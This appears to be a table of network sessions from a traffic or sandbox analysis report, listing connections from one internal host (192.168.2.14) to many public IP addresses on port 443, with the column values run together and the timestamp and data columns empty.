                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13867192.168.2.1434860106.70.159.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13868192.168.2.1460638203.89.132.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13869192.168.2.1445636118.227.76.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13870192.168.2.1454914180.181.16.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13871192.168.2.144277262.127.8.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13872192.168.2.1460554129.35.198.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13873192.168.2.144584838.167.194.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13874192.168.2.144979613.12.92.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13875192.168.2.1449988223.220.42.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13876192.168.2.144973243.235.238.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13877192.168.2.1441500147.210.6.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13878192.168.2.146069427.22.140.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13879192.168.2.1451914151.113.135.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13880192.168.2.1434310114.33.67.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13881192.168.2.144126088.223.156.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13882192.168.2.1434642144.116.196.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13883192.168.2.14593821.248.184.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13884192.168.2.145392670.216.35.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13885192.168.2.1442636157.157.142.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13886192.168.2.1456276187.38.80.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13887192.168.2.1460950115.241.138.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13888192.168.2.1438470196.212.164.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13889192.168.2.144327492.72.131.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13890192.168.2.143792270.24.54.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13891192.168.2.145426075.177.228.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13892192.168.2.144967675.108.40.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13893192.168.2.145158869.145.180.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13894192.168.2.1455990172.192.35.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13895192.168.2.1457422126.206.68.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13896192.168.2.145183284.107.255.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13897192.168.2.1434428108.52.105.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13898192.168.2.1441398191.235.20.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13899192.168.2.1450386197.7.168.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13900192.168.2.1445170170.246.115.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13901192.168.2.1459782192.241.3.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13902192.168.2.1445002211.165.221.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13903192.168.2.145502289.234.4.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13904192.168.2.145855849.93.11.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13905192.168.2.145966670.195.94.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13906192.168.2.144703271.24.89.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13907192.168.2.1458806159.255.157.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13908192.168.2.1442106105.205.118.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13909192.168.2.1459600202.149.236.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13910192.168.2.1450752174.121.158.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13911192.168.2.1440964216.177.65.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13912192.168.2.14492288.202.188.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13913192.168.2.1444174179.198.115.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13914192.168.2.143878014.197.196.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13915192.168.2.143811676.71.219.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13916192.168.2.1442408212.160.76.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13917192.168.2.1436376113.60.229.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13918192.168.2.1460044160.212.242.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13919192.168.2.1435758168.50.202.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13920192.168.2.1441974154.87.69.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13921192.168.2.143722412.181.248.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13922192.168.2.1438922175.207.223.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13923192.168.2.143952094.176.24.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13924192.168.2.143306053.220.228.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13925192.168.2.144734481.247.153.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13926192.168.2.145015627.171.236.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13927192.168.2.1448678108.191.230.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13928192.168.2.1449280110.89.34.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13929192.168.2.1434636173.8.239.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13930192.168.2.1457154177.230.120.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13931192.168.2.143886858.52.126.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13932192.168.2.143802866.74.85.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13933192.168.2.1449284164.126.77.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13934192.168.2.144838639.69.185.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13935192.168.2.14331984.157.158.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13936192.168.2.1440244156.2.122.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13937192.168.2.1440064112.34.66.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13938192.168.2.143424443.80.139.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13939192.168.2.1459662199.120.218.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13940192.168.2.14606568.39.157.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13941192.168.2.143927667.121.64.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13942192.168.2.144635061.31.22.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13943192.168.2.1436810184.118.125.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13944192.168.2.1451006124.184.118.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13945192.168.2.1458018121.51.240.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13946192.168.2.1435922203.47.183.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13947192.168.2.1451406206.158.44.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13948192.168.2.1438662193.46.81.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13949192.168.2.1437324190.90.13.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13950192.168.2.1444986218.3.106.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13951192.168.2.1457614166.66.85.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13952192.168.2.1458642188.175.190.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13953192.168.2.1439866171.206.192.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13954192.168.2.144398692.129.181.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13955192.168.2.1457022112.176.109.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13956192.168.2.1449554162.67.182.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13957192.168.2.1456996171.200.25.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13958192.168.2.14441262.213.217.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13959192.168.2.145198078.115.154.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13960192.168.2.1436554103.29.81.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13961192.168.2.1438242151.113.87.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13962192.168.2.145131646.56.12.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13963192.168.2.1454666151.187.17.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13964192.168.2.1454434181.47.175.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13965192.168.2.1452730212.177.173.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13966192.168.2.144839840.105.82.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13967192.168.2.1435620183.176.85.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13968192.168.2.144483423.33.2.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13969192.168.2.143463651.117.145.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13970192.168.2.1452502132.98.141.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13971192.168.2.1455406110.216.206.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13972192.168.2.1438230113.250.250.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13973192.168.2.143735284.114.203.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13974192.168.2.145283895.91.104.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13975192.168.2.1443838130.186.218.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13976192.168.2.1440772142.23.138.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13977192.168.2.1455690188.186.202.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13978192.168.2.1443182187.237.169.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13979192.168.2.1453266114.213.74.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13980192.168.2.144086419.27.24.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13981192.168.2.143810098.123.40.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13982192.168.2.143647213.60.157.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13983192.168.2.1448906186.250.8.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13984192.168.2.1440646209.165.17.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13985192.168.2.1437976158.92.159.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13986192.168.2.1434772113.252.248.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13987192.168.2.1452266131.27.159.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13988192.168.2.145834895.210.237.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13989192.168.2.144163682.82.141.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13990192.168.2.144921023.196.9.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13991192.168.2.1459512207.34.90.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13992192.168.2.1441768101.243.48.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13993192.168.2.1439608194.8.193.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13994192.168.2.143513863.11.42.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13995192.168.2.144154274.241.72.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13996192.168.2.1445652135.249.88.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13997192.168.2.1444840169.19.205.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13998192.168.2.1439848197.119.104.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      13999192.168.2.1452958166.241.47.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14000192.168.2.144568095.174.21.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14001192.168.2.14335628.43.164.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14002192.168.2.1445144153.155.207.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14003192.168.2.1434764194.10.168.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14004192.168.2.144825823.68.13.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14005192.168.2.1450512204.121.211.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14006192.168.2.1460960164.60.0.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14007192.168.2.1446462125.241.92.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14008192.168.2.1433028145.51.23.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14009192.168.2.1435268104.54.93.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14010192.168.2.144818899.176.53.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14011192.168.2.1442546104.211.131.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14012192.168.2.145026817.201.245.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14013192.168.2.1433210119.15.175.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14014192.168.2.143709864.79.20.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14015192.168.2.1455272124.133.28.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14016192.168.2.1459044107.181.79.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14017192.168.2.1443428195.53.58.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14018192.168.2.1448976180.139.27.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14019192.168.2.143345068.220.229.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14020192.168.2.1458254138.19.37.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14021192.168.2.144136659.179.226.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14022192.168.2.1437768112.36.90.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14023192.168.2.1444624203.111.39.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14024192.168.2.1440138111.47.185.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14025192.168.2.143890088.10.86.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14026192.168.2.145379454.31.43.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14027192.168.2.1438422198.200.226.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14028192.168.2.1451118135.30.158.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14029192.168.2.1439412114.112.149.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14030192.168.2.145618851.205.42.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14031192.168.2.144745885.163.237.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14032192.168.2.1444942220.140.103.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14033192.168.2.1446362172.122.194.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14034192.168.2.14448429.143.57.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14035192.168.2.14455802.151.131.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14036192.168.2.145784844.247.194.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14037192.168.2.143511298.224.144.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14038192.168.2.144540683.60.132.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14039192.168.2.14463405.40.130.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14040192.168.2.1446010117.160.143.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14041192.168.2.143384481.165.35.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14042192.168.2.144315686.87.66.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14043192.168.2.145827067.11.5.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14044192.168.2.1451900172.78.191.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14045192.168.2.143510237.174.248.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14046192.168.2.1455868152.123.130.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14047192.168.2.143924047.62.24.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14048192.168.2.145482860.181.112.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14049192.168.2.1455282143.76.247.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14050192.168.2.1442090174.81.33.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14051192.168.2.144710492.12.163.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14052192.168.2.145382680.72.207.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14053192.168.2.1454740208.91.136.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14054192.168.2.145050891.227.234.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14055192.168.2.1457988125.248.190.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14056192.168.2.1442202105.155.125.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14057192.168.2.146034268.178.35.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14058192.168.2.146094646.201.248.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14059192.168.2.1452198174.217.159.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14060192.168.2.144706014.7.19.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14061192.168.2.1437720154.182.91.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14062192.168.2.1441618144.196.252.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14063192.168.2.1439534170.226.7.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14064192.168.2.1435718198.73.72.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14065192.168.2.143833477.18.44.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14066192.168.2.14393505.226.123.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14067192.168.2.1433320136.18.231.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14068192.168.2.143332665.130.212.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14069192.168.2.144265660.29.125.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14070192.168.2.143735063.219.20.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14071192.168.2.144809627.38.254.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14072192.168.2.1432812187.253.146.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14073192.168.2.1454482169.18.149.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14074192.168.2.1443524125.207.106.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14075192.168.2.1457440140.71.67.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14076192.168.2.145302675.183.14.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14077192.168.2.14553985.181.30.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14078192.168.2.144994035.149.249.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14079192.168.2.144241444.5.223.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14080192.168.2.1447310147.100.13.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14081192.168.2.145540841.134.27.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14082192.168.2.1456686106.27.52.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14083192.168.2.144574620.253.26.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14084192.168.2.1442862100.1.229.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14085192.168.2.1447636205.236.117.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14086192.168.2.144107299.11.200.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14087192.168.2.144298869.211.16.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
